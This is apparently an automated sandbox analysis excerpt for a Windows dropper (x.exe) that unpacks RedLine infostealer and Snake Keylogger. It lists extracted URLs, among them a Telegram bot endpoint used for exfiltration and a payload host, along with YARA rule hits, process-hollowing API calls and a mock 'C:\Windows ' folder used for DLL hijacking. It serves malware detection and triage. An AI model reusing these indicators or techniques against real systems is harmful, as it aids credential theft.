            Source: x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.drString found in binary or memory: http://www.pmail.com0
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D458000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D458000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD66000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
            Source: liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.orgfl
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: x.exe, 00000001.00000002.1875750599.00000000205CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.volareconsultoria.com.br/245_Uhzauuilkul
            Source: x.exe, 00000001.00000002.1855286953.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.volareconsultoria.com.br/u
            Source: x.exe, 00000001.00000002.1855286953.0000000000751000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.volareconsultoria.com.br:443/245_Uhzauuilkuluo
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownHTTPS traffic detected: 50.116.86.44:443 -> 192.168.2.4:49731 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 17.2.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.1.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.2.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.1.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 1.2.x.exe.21751178.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.1.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.1.liuuazhU.pif.43d038.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.1.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.1.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.2.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 17.1.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 10.2.Uhzauuil.PIF.20f96fd8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 6.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 11.1.liuuazhU.pif.43d038.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.2.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 6.1.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 1.2.x.exe.215607b8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 17.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000B.00000002.3089643523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000011.00000002.3089641728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000006.00000001.1853843841.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            PE file contains section with special chars
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Source: NETUTILS.dll.1.drStatic PE information: section name: .
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E82CC NtReadVirtualMemory,1_2_027E82CC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EE064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,1_2_027EE064
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E853C NtUnmapViewOfSection,1_2_027E853C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E7A2C NtAllocateVirtualMemory,1_2_027E7A2C
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EDEF8 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile,1_2_027EDEF8
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EDF80 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,1_2_027EDF80
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_027E8C28
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E7D78 NtWriteVirtualMemory,1_2_027E7D78
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E7A2A NtAllocateVirtualMemory,1_2_027E7A2A
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EDEA4 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile,1_2_027EDEA4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_027E8C26
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_029982CC NtReadVirtualMemory,16_2_029982CC
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_0299E064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,16_2_0299E064
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_0299853C NtUnmapViewOfSection,16_2_0299853C
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_02997A2C NtAllocateVirtualMemory,16_2_02997A2C
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_02998C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_02998C28
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_02997D78 NtWriteVirtualMemory,16_2_02997D78
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_029985C8 NtUnmapViewOfSection,16_2_029985C8
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_02997A2A NtAllocateVirtualMemory,16_2_02997A2A
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_0299DEA4 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_0299DEA4
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_0299DEF8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,16_2_0299DEF8
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_0299DF80 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,16_2_0299DF80
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFCode function: 16_2_02998C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_02998C26
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E8654 CreateProcessAsUserW,1_2_027E8654
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\svchost.pifJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Windows \SysWOW64\NETUTILS.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\WindowsJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \SysWOW64Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile deleted: C:\Windows \SysWOW64\svchost.pifJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D20C41_2_027D20C4
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00408C606_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0040DC116_2_0040DC11
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00407C3F6_2_00407C3F
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00418CCC6_2_00418CCC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00406CA06_2_00406CA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004028B06_2_004028B0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_0041A4BE6_2_0041A4BE
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00408C606_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004182446_2_00418244
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004016506_2_00401650
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00402F206_2_00402F20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004193C46_2_004193C4
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004187886_2_00418788
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00402F896_2_00402F89
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_00402B906_2_00402B90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004073A06_2_004073A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_1CFC15C86_2_1CFC15C8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_1CFC0F206_2_1CFC0F20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_1CFC0F106_2_1CFC0F10
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_201865656_2_20186565
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_2018EDD06_2_2018EDD0
